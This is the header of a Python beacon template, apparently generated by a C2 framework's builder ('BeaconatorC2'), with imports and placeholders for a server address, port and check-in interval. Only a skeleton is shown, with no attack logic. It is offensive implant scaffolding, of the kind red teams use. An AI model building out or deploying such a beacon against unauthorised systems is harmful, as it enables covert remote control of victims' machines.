#!/usr/bin/env python3
"""
Python Beacon - Generated by BeaconatorC2 Beacon Builder
Multi-protocol beacon supporting TCP, UDP, SMB, and HTTP communication
"""

import argparse
import base64
import hashlib
import os
import platform
import socket
import subprocess
import sys
import threading
import time
import urllib.parse
import urllib.request
import uuid
from pathlib import Path

# Configuration (substituted during build)
SERVER_IP = "{{server_ip}}"
SERVER_PORT = {{server_port}}
CHECK_IN_INTERVAL = {{checkin_interval}}
SCHEMA_FILE = "{{schema_filename}}"
DEFAULT_PROTOCOL = "{{default_protocol}}"
